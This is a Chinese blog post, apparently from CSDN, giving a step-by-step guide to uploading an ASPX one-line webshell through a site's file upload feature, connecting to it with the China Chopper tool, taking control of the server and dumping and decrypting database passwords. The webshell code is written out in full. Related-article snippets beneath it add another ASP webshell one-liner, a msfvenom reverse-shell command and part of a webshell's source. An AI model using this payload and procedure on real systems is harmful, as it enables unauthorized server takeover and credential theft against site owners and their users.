上传后门程序(木马)并控制目标主机

最新推荐文章于 2024-07-25 21:40:10 发布
最新推荐文章于 2024-07-25 21:40:10 发布
阅读量183 收藏
点赞数 2
文章标签: 安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62880319/article/details/137902230
版权

一句话木马的使用

1、新建文本文档,将文件后缀修改为aspx,书写内容如下:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密。

遇到问题:第6步,无法获取数据库文件

解决方法:点击b_admin,将select语句后面的ORDER BY 1 DESC删除,并执行,即可出现目标数据。

Bla ?k
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【WEB漏洞原理】任意文件上漏洞
过期的秋刀鱼
08-29 1902
文件上是web应用必备功能之一,如:头像上,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上漏洞。
文件上漏洞
nigo134的博客
03-22 4030
原理 这主要看一些文件上的代码有没有 严格限制用户上的文件类型,比如,只可以上.jpg|.png|.gif文件,但是由于代码不严谨,或者只在前端验证这个文件的格式等等,造成了攻击者可以上任意PHP文件,自定义文件。 危害 可以通过这个漏洞上后门文件,webshell,可以直接获取网站权限,然后获取服务器的提权,获取内网权限,或去用户信息等等。属于高危漏洞。 文件木马 ASP <%eval request( "x")%> <%execute request(...
在我的网站上后门拿到webshell的文件sitemap.asa
Sunny
04-07 1427
<!--<% Option Explicit Response.Buffer = True Dim url, conn, sUrlB, theAct, thePath, rootPath, PageSize Dim accessStr, pageName, sysFileList, isSqlServer, sPacketName theAct = GetPos
webshell后门流程
weixin_34290096的博客
07-08 1497
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上头像将web.jpg上期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上图片名称的代码改成web.php,之后继续响应请求。3、此时已经成功把后门程序,将服务器反馈的代码中含有路径的部分复制粘贴到网站U...
超浅谈web安全中的sql注入以及上后门
fishermanmax的博客
10-30 3332
先上几道好吃的菜:firefox的hackbar工具。可以灵活的处理URL里的各种方式的加密解密。 硬菜:sqlmap 自动检测一个网站的各种可能存在的注入。-D 指定库 -T 指定表 -C 指定列 -dump-all全导出 (以下内容只在.php上面进行相应的测试,没有因为什么,因为我是只会PHP的菜鸟...) 一般的sql URL攻击步骤:  1、在index.php?
永恒之蓝漏洞复现及上后门程序
dreamthe的博客
11-18 3707
自己实在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,自己去选择版本 这里记得选择桥接模式 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 可以ka里面用nmap扫描靶机开了那些端口 输入msfdb run 进入msf中 开始搜索ms17_010 命令 search ms17_010 先使用aux模块扫描靶机有无漏洞 步骤如下 第一步 使用扫描模块 use a...
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4042
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
Web木马与文件上漏洞
weixin_62707591的博客
06-20 2780
目录 一、认识Web木马 1.1 木马概念 1.2 web木马危害 1.2.1 攻击者留后门 1.2.2 文件、数据库操作 1.2.3 修改web页面 1.3 Web 木马特点 1.3.1Web木马可大可小 1.3.2 无法有效隐藏 1.3.3 具有明显特征值 1.3.4 必须为可执行的网页格式: 1.4 Web木马分类 1.4.1 一句话木马 1.4.2 大马小马 二、初识文件上漏洞 2.1 文件上漏洞的概念 2.2 文件上漏洞的危害 2.2.1 非授权用户的越
木马查杀及后门
weixin_30897233的博客
05-09 403
转自互联网 0x00 木马后门学习 后门木马又称特洛伊木马,英文叫做“Trojan horse”,其名称取自希腊神话的特洛伊木马记,它是一种基于远程控制的黑客工具。在黑客进行的各种攻击行为中,木马都起到了开路先锋的作用。 1、特洛伊木马 特洛伊木马属于客户/服务模式。它分为两大部分,即客户端和服务端。 其原理是一台主机提供服务(服务器),另一台主机...
在线扫描探测检查asp站点木马后门程序
10-31
在线扫描探测检查asp站点木马后门程序
木马/后门程序在WINNT中进程隐藏和查找的方法
11-06
在Windows NT操作系统中,木马后门程序的隐藏技术是一项关键挑战,因为与Windows 9x系统不同,它们无法轻易地通过注册为系统服务来避开进程查看器。这篇文章主要探讨了在NT环境下,木马如何隐蔽其进程以及如何被...
Linux下查找后门程序 CentOS 查后门程序的shell脚本
01-20
一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流着大量的rootkit。假如是内核级的木马,那么该方法就无效了)。 因为修改系统内核相对复杂...
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
企业如何保证公司内网安全
shunyou0526的博客
07-25 175
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 186
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 280
2024安全大模型技术与市场研究报告
一线工作中常用 Shell 脚本: Jar包部署为linux系统服务; 恶意访问,安全防范; SSH 免交互执行命令;
最新发布
iOS逆向与安全
07-25 54
当要使用多个不同的private key登录不同的主机时,我们可以在ssh命令里面用-i参数指定每次使用的private key文件。需求: 通过脚本自动化部署(自动远程登录、远程复制本地资源到服务器,远程执行部署相关命令。之间,remotessh可以随便修改成其他形式的字符串。可以利用~/.ssh/config文件,在让ssh自动为我们决定应该使用哪个key。在文本中搜索指定的内容——grep命令的常用选项。远程执行的命令内容较多,使用脚本方式实现。方法2:通过TCP建立的连接。
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 531
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
ASP木马后门程序:黑色界面版
"一款asp木马程序,具备黑色界面,包含后门功能,有版权声明,主要用于文件操作。" 在ASP(Active Server Pages)编程环境中,木马是一种恶意脚本,通常被黑客用来非法获取服务器权限,执行非法操作。这款名为"黑色...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值